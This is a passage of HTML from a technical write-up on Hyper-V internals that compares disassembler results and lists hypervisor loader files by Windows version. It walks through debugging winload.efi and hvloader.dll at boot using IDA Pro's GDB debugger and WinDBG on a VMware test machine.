18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 414px; overflow: hidden; width: 383px;"><img height="414" src="https://lh5.googleusercontent.com/kHzYcgXP7Fgkdp8Ve1zPrbiVakGgDjy1nN36lQpt3xwb-o__2MIYeiy4t8KpjijDX3nK6OYdGBFfSdOkJ2CeNlllIRx5hZU7gxZJn5RociyixClxXGMus4WFc_LRf3jkdezadARnoAreyrorWg" style="margin-left: 0px; margin-top: 0px;" width="383" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Interesting, that Ghidra during analysis could find 4100 functions inside hvix64.exe (build 10.0.17763.1577), IDA PRO found 3687 functions (without manual definitions).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At the time of publication, Ghidra had new “debugging” fork, but kernel mode debugging is not available. It is recommended to see to the developer stage of that fork. Embedded Ghidra debugger must be should be much more convenient.</span></p><h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 12pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypervisor loading</span></h1><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hypervisor loader component has some changing during Hyper-V evolution:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvboot.sys - Windows Server 2008, 2008 R2;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvloader.exe or hvloader.efi - Windows Server 2012 R2,2016;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvloader.dll - Windows 10, Windows Server 2019.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG debugging is comfortable enough, but in some stages of hypervisor loading debugging is not accessible (functions, like BlBdStop, disable debugger), therefore we will see hypervisor loading through GDB.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also we can use this method, when WinDBG is not available (f.e. when OS is loaded with Secure Boot option). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, we must prepare IDA PRO databases for GDB debugging. We have 3 files:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvix64.exe</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvix64.exe and hvloader.dll doesn’t have symbols.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Firstly, we connect WinDBG (we need to find loading offsets of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Secondly, we disable WinDBG, enable SecureBoot in host OS and start debug it.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For testing I used Windows Server 2019 (4 CPU. CPU count is not important during boot process, but when you load hypervisor and NT-kernel you will be constantly switched between it – it is critical during single step debugging). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We will debug </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> first. IDA PRO shows limited debugger options, when application type is windows boot. Open your favorite PE editor, select “</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Optional header</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Subsystem</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">” and change “Windows boot application” to “Windows GUI”.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The research used hvloader.dll (10.0.10011.0) and hvix64.exe (10.0.10074.0). Before debugging load winload.exe into IDA PRO, choose </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugger</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Select Debugger</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GDB</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, in the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Process Options</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> to specify the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hostname</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 127.0.0.1 and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">port</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 8864.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 168px; overflow: hidden; width: 349px;"><img height="168" src="https://lh5.googleusercontent.com/rfD1RhHz_K2F6NzMfdYDhGpL__VwgbSGdpqsrZ1s_q0mMcVF2vuaTXgoNaUHwjhu-Qrtc7nAnAxJCqdpWyHok0WqEGocuwTqD7LqoARaSiAWCYCABq6gKXTF6WTIHBuLJ3y7rly58qRKdk5rcg" style="margin-left: 0px; margin-top: 0px;" width="349" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Thanks to the previously installed boot loader option </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootdebug on, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winload.efi breaks on early boot stage in winload!DebugService2, and using WinDBG we can see image base.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run WinDBG:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG.exe -b -k net:port=50002,key=1.2.3.4</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And find address of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> lm</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">start end </span><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: white; color: blue; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">module name</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`008c4000 00000000`00aa5000 </span><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: white; color: blue; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">winload</span><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pdb symbols)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We already loaded winload.efi in IDA PRO, now we can choose </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugger</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">attach</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">to</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">process</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> for attaching to VMware GDB stub, and after stopping, run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Edit->Segments->Rebase</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> program, specified in the Image base load address </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x008c4000) and save it in IDA PRO. ASLR is not used in that case, so loading address is not changed, when you restart Windows. </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> can be debugged without </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rebase </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">operation.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">set breakpoint in IDA PRO on winload!OslArchHypervisorSetup and continue debugging (F9). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">also continue debugging in WinDBG (F5).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 0.05pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winload!OslGetHypervisorLaunchType checks, if hypervisorlaunchtype (0x250000f0) was set.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 129px; overflow: hidden; width: 405px;"><img height="129" src="https://lh4.googleusercontent.com/zqAwWQZ9f9GsxFhg8u1S9HfrYoXQqLcjEh4sCCuKwidcDXVO6K_bxKEK6XUr3e5LFEbk0BlZWT9dzssNT3tWCywzAgxCPa0JcLT1JC6pijzny8mW8g4Qs6QJZGvBYfrjyy2ouH6pnXrhdGG3lA" style="margin-left: 0px; margin-top: 0px;" width="405" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 190px; overflow: hidden; width: 409px;"><img height="190" src="https://lh5.googleusercontent.com/YJHoEn4Bv1vFvShkbKsUBXZKFGNG-3rSK-EvPJWiCBJrQSaVwbfnKGilk1146X213Hwwzj7HpkBgdmXiR2iOjrZwA0vue6DOjhG2sW-9PLMCoNsaWDokTWt8KALNuuGCKyOKbrGlGJA3SOETLg" style="margin-left: 0px; margin-top: 0px;" width="409" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If parameter is specified and its value is 1 (Auto), function try to load </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and get addresses of exported functions:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlRescindVsm</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlLaunchHypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlLoadHypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlRegisterRuntimeRange</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlUpdateMcUpdateStatus</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlPreloadHypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 299px; overflow: hidden; width: 421px;"><img height="299" src="https://lh5.googleusercontent.com/98dRUyvFKaXyM3-vFVDocGHFkIfOZ4UXnG43juTMmuHlybRjtnwN1wspOZafV9d5LBmG5St4ljllhlGj5M7Xjf-CDOFcxpMpehdDVOr4zAqATDN-FL2RGfntzEBcaQzTruU4FCefw60ejh1d3Q" style="margin-left: 0px; margin-top: 0px;" width="421" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 